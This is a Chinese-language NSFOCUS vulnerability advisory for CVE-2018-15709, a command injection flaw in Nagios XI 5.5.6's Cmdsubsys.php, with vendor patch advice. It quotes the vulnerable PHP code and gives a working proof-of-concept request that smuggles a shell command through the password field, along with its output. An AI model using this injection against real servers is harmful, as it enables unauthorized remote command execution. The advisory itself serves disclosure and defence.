安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Nagios Cmdsubsys.php命令注入漏洞(CVE-2018-15709)
发布日期:
2018-12-07
更新日期:
2018-12-11
受影响系统:
Nagios XI 5.5.6
描述:
CVE(CAN) ID:
CVE-2018-15709
Nagios XI是一套IT基础设施监控解决方案。
Nagios XI 5.5.6版本,在Cmdsubsys.php实现中存在命令注入安全漏洞。远程攻击者可通过发送特制的HTTP请求,利用该漏洞注入并执行任意OS命令。
<*来源:vendor
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
vendor ()提供了如下测试方法:
case COMMAND_NAGIOSXI_SET_HTACCESS:
$cmdarr = unserialize($command_data);
$cmdline = $cfg['htpasswd_path']." -b -s ".$cfg['htaccess_file']." ".$cmdarr["username"]." '".$cmdarr["password"]."'";
break;
...
$output = system($cmdline, $return_code);
https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312
$ cat /usr/local/nagiosxi/tmp/whoami.txt
nagios
建议:
厂商补丁:
Nagios
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.nagios.org/
参考:
https://www.tenable.com/security/research/tra-2018-37
浏览次数:
2410
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客